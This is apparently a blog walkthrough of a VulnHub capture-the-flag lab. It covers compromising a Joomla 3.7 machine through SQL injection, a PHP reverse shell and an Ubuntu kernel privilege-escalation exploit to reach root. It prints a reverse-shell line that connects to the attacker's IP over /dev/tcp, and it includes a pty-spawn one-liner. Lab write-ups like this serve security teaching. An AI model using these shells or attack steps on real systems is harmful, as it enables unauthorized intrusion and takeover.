There is only one flag, and we could see the flag only if we are root. The location of these flags are just an indicator where a good penetration tester should look. An alternative approach could also be to directly get to root.
Blog notes :
- attacker machine : I used a kali linux machine for all my attack labs.
- victim machine : It is available in vulnhub, please follow the above link.
- Enumeration : means listing and searching for information. It refers to knowing more about your victim machine. It is very general term. list of users, list of directories, list of open ports, list of vulnerabilities.
- Points of privilege escalation : A list of methods and techniques for privilege escalation. Instead of creating a list in text form, I have created a tool which automate the process of privilege escalation and other penetration steps. I have created this tool by my own experience while working on vulnhub labs.
Step 1 —Active Information Gathering
- Host discovery
- Port scanning
We get to know that HTTP services are running. There must be webpage.
From the above image, we know that the website is built using Joomla CMS framework. The first thing that strikes to my mind is web application penetration testing, means I could find a tool in the internet such that it is designed for Joomla application vulnerability scanning, like what we have for wordpress scanning (WPScan).
Step 2 — Vulnerability Scanning (Joomla)
- Nmap vuln NSE script
- Search for version of frameworks and services running on victim system.
Joomla is running on v3.7 which is vulnerable to SQL Injection exploit.
Step 3 — Exploitation
We could now take an overview from yotube that how an SQL injection attack works using SQL Map.
In this way we could query the database. Note that database stores password in hashed form. Hence our current aim should be to find that hash value.
Traversing through database we came across a password hash for the user “admin”
Also we know that SSH services is not running. If SSH was running, we could have used the password hash directly to login to the victim system.
At this point our aim is to get a remote shell access of the victim system. But SSH services are not running. No matter which technique we use we cannot access connection originating from outside to inside the victim system. Hence we need to somehow find a method to generate connection originating from inside the victim system to outside. This is could be achieve by reverse shells. Reverse shell could be created using generally by any scripting language.
Also we know that Joomla framework uses PHP, so it is logical to use PHP script to create reverse shells.
<?phpexec("/bin/bash -c ‘bash -i >& /dev/tcp/192.168.137.11/1234 0>&1’”);
Or you could use the proper PHP reverse shell script.
Also in our attacker machine, we need to start a listner for the reverse shell. Once all the configurations are proper we will get the output as below.
Step 4 — Enumeration and Privilege Escalation (used for cases where the remote shell is a restricted shell)
- Using, point of privilege escalation, we could try to find a more powerful shell if present. We could use the below command to list all available shells.
- There are many methods for shell escape techniques to switch to a more powerful shell if present. Also do check the environment variable “path” to make sure all the commands are available.
python -c ‘import pty;pty.spawn("/bin/bash")'
Step 5 — Vulnerability Scanning (Linux)
- Could also be done before the previous steps, but enumeration and vulnerability scanning go hand in hand
- Could use tools for vulnerability scanning, but one should always start with check which software is running and of which version. We try to find the vulnerability passively first. This is generally a good practice.
- Checking the linux version we found that it is using Ubuntu 16.04 which is vulnerable to a privilege escalation exploit.
Step 6 — Privilege Escalation
- The exploit is in a form a script, we then downloaded the exploit.
- We then executed the exploit to get root access.
Finally we go root access. Traversing to “/root” directory we got our flag.
Important Takeaway from this lab :
- We learned to get remote access if port 22 (SSH) is not running in victim system, using reverse shell.
- We learned how to search for vulnerabilities if in case the automated vulnerability scanner failed to find the vulnerabilities. We first find the versions of web applications and linux OS to search for vulnerabilities in the respective version passively before using automated tools. This is a good practice.
- We learned how to execute PHP scripts or any language scripts, even if we do not have the proper rights. In this example only “admin” has the right to create PHP pages, “jerry” and “tom” were not allowed. But we find a way (using “preview of page”) to run PHP scripts.